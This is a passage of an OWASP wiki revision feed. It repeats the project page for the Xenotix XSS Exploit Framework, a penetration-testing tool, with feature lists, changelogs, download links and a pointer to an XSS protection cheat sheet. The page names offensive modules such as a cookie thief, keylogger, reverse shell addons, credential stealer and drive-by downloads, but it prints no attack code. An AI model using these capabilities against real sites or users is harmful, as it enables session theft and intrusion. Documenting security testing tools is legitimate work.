VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183574</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183574"/>
				<updated>2014-10-12T15:02:17Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: /* Latest Release */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183573</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183573"/>
				<updated>2014-10-12T14:08:42Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: md5 fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
